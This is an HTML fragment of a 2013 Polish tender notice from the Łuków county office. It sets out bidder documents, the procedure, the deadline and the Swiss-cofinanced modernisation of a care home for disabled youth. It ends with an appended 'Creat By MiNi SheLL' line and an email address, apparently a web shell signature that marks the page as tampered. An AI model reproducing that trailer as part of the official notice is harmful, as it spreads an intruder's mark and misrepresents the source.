<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://splukow.bip4.e-zeto.eu/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Łukowie, Wydział Inwestycji i Zamówień Publicznych, 21-400 Łuków ul. Czerwonego Krzyża 4 pok.4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Łukowie, 21-400 Łuków ul. Piłsudskiego 17, sekretariat pok. 209.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu pn. Rozbudowa i modernizacja DPS w Łukowie działaniem przeciw wykluczeniu społecznemu dzieci i młodzieży niepełnosprawnej intelektualnie realizowanego w ramach Programu Poprawa jakości usług świadczonych w domach pomocy społecznej i placówkach opiekuńczo - wychowawczych. Projekt współfinansowany przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi w Unii Europejskiej. Celem projektu jest poprawa usług podstawowej opieki zdrowotnej i usług opieki społecznej na peryferyjnych i zmarginalizowanych terenach obszarów objętych koncentracją geograficzną, z preferencją dla wielosektorowego podejścia programowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com